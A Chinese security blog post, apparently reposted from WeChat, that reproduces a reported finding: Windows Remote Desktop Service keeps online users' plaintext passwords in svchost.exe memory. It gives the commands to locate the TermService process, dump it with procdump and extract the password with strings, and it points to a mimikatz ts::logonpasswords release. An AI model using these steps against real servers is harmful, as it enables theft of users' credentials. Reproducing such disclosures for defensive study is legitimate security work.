从svchost.exe转储RDP在线用户的明文密码

  • A+
所属分类:安全文章

推特上看到一篇推文 https://twitter.com/jonasLyk/status/1393058962942083076 他发现了在远程桌面服务的内存中存储了用户明文密码,本文复现下。

转储明文

我有一台08的server,账号密码为administrator [email protected]#。使用3389登录

从svchost.exe转储RDP在线用户的明文密码
image.png

运行如下命令转储远程桌面服务的进程内存

netstat -nob | Select-String TermService -Context 1.procdump.exe -accepteula -ma 2812 rdp.dmp

然后用strings过滤字符串发现确实抓到了明文


strings -el rdp.dmp |grep admin08 -C3
从svchost.exe转储RDP在线用户的明文密码
image.png

mimikatz发布了一个Pre-release版本[1],提供了ts::logonpasswords一键抓取,不过在2008上不起作用,等待本杰明继续更新。

从svchost.exe转储RDP在线用户的明文密码
image.png

思考

其他进程中是否还有明文保存?转储远程桌面服务进程的内存是不是不会被杀软拦截了?Windows是不是不安全了?

References

[1] Pre-release版本: https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210518


分享、点赞、看就是对我们的一种支持!

从svchost.exe转储RDP在线用户的明文密码


本文始发于微信公众号(ChaBug):从svchost.exe转储RDP在线用户的明文密码

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: